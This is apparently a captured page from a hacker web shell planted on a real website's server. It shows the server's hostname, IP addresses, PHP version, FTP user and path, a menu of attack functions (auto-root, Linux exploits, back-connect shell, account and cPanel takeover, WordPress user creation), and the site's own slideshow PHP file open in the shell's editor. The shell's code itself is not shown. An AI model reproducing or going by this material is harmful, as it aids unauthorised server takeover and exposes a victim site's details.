Linux server.thearyasamaj.org 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
Apache
: 103.90.241.146 | : 216.73.216.6
Cant Read [ /etc/named.conf ]
5.6.40
ftpuser@mantra.thearyasamaj.org
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
thearyasamaj /
public_html /
sideshowtour /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
theme
[ DIR ]
drwxr-xr-x
aryasamaj-takeatourslideshow.p...
5.96
KB
-rw-r--r--
demo.html
7.71
KB
-rw-r--r--
fade.html
6.13
KB
-rw-r--r--
slide.html
6.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : aryasamaj-takeatourslideshow.php
<?php include('../include/aryasamaj-clientinclude.php'); ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <!-- Supersized - Fullscreen Slideshow jQuery Plugin Version : 3.2.7 Site : www.buildinternet.com/project/supersized Author : Sam Dunn Company : One Mighty Roar (www.onemightyroar.com) License : MIT License / GPL License --> <head> <title>Supersized - Full Screen Background Slideshow jQuery Plugin</title> <meta http-equiv="content-type" content="text/html; charset=UTF-8" /> <link rel="stylesheet" href="css/supersized.css" type="text/css" media="screen" /> <link rel="stylesheet" href="theme/supersized.shutter.css" type="text/css" media="screen" /> <script type="text/javascript" src="../js/jquery.min.js"></script> <script type="text/javascript" src="js/jquery.easing.min.js"></script> <script type="text/javascript" src="js/supersized.3.2.7.min.js"></script> <script type="text/javascript" src="theme/supersized.shutter.min.js"></script> <script type="text/javascript"> jQuery(function($){ $.supersized({ // Functionality slideshow : 1, // Slideshow on/off autoplay : 1, // Slideshow starts playing automatically start_slide : 1, // Start slide (0 is random) stop_loop : 0, // Pauses slideshow on last slide random : 0, // Randomize slide order (Ignores start slide) slide_interval : 3000, // Length between transitions transition : 6, // 0-None, 1-Fade, 2-Slide Top, 3-Slide Right, 4-Slide Bottom, 5-Slide Left, 6-Carousel Right, 7-Carousel Left transition_speed : 1000, // Speed of transition new_window : 1, // Image links open in new window/tab pause_hover : 0, // Pause slideshow on hover keyboard_nav : 1, // Keyboard navigation on/off performance : 1, // 0-Normal, 1-Hybrid speed/quality, 2-Optimizes image quality, 3-Optimizes transition speed // (Only works for Firefox/IE, not Webkit) image_protect : 1, // Disables image dragging and right click with Javascript // Size & Position min_width : 0, // Min width allowed (in pixels) min_height : 0, // Min height allowed (in pixels) vertical_center : 0, // Vertically center background horizontal_center : 0, // Horizontally center background fit_always : 0, // Image will never exceed browser width or height (Ignores min. dimensions) fit_portrait : 0, // Portrait images will not exceed browser height fit_landscape : 0, // Landscape images will not exceed browser width // Components slide_links : 'blank', // Individual links for each slide (Options: false, 'num', 'name', 'blank') thumb_links : 1, // Individual thumb links for each slide thumbnail_navigation : 0, // Thumbnail navigation slides : [ // Slideshow Images <?php $qryselslide="select * from arya_takeatour where takeatour_showon='Yes' AND takeatour_delstatus='No'"; $qselslide=mysql_query($qryselslide); $numrow=mysql_num_rows($qselslide); if($numrow > 0) { $i=1; while($fetch=mysql_fetch_array($qselslide)) { $title=$fetch['takeatour_title']; $fetchimage=$fetch['takeatour_image']; $newname=str_replace("./","",$fetchimage); $pamphimage=str_replace('SM','BG',$newname); $imagepath=$pathvar.$pamphimage; if($numrow >= $i) { ?> {image : '<?php echo $imagepath;?>', title : '<?php echo $title;?>', thumb : '<?php echo $imagepath;?>', url : '<?php echo $imagepath;?>'}, <?php } else { ?> {image : '<?php echo $imagepath;?>', title : '<?php echo $title;?>', thumb : '<?php echo $imagepath;?>', url : '<?php echo $imagepath;?>'} <?php } $i++; }//while($fetch=mysql_fetch_array($qselslide)) }//if($numrow > 0) ?> ], // Theme Options progress_bar : 1, // Timer for each slide mouse_scrub : 0 }); }); </script> </head> <style type="text/css"> ul#demo-block{ margin:0 15px 15px 15px; } ul#demo-block li{ margin:0 0 10px 0; padding:10px; display:inline; float:left; clear:both; color:#aaa; background:url('img/bg-black.png'); font:11px Helvetica, Arial, sans-serif; } ul#demo-block li a{ color:#eee; font-weight:bold; } </style> <body> <!--Thumbnail Navigation--> <div id="prevthumb"></div> <div id="nextthumb"></div> <!--Arrow Navigation--> <a id="prevslide" class="load-item"></a> <a id="nextslide" class="load-item"></a> <div id="thumb-tray" class="load-item"> <div id="thumb-back"></div> <div id="thumb-forward"></div> </div> <!--Time Bar--> <div id="progress-back" class="load-item"> <div id="progress-bar"></div> </div> <!--Control Bar--> <div id="controls-wrapper" class="load-item"> <div id="controls"> <a id="play-button"><img id="pauseplay" src="img/pause.png"/></a> <!--Slide counter--> <div id="slidecounter"> <!--<span class=""></span><span class="totalslides"></span>--> </div> <!--Slide captions displayed here--> <div id="slidecaption"></div> <!--Thumb Tray button--> <a id="tray-button"><img id="tray-arrow" src="img/button-tray-up.png"/></a> <!--Navigation--> <ul id="slide-list"></ul> </div> </div> </body> </html>
Close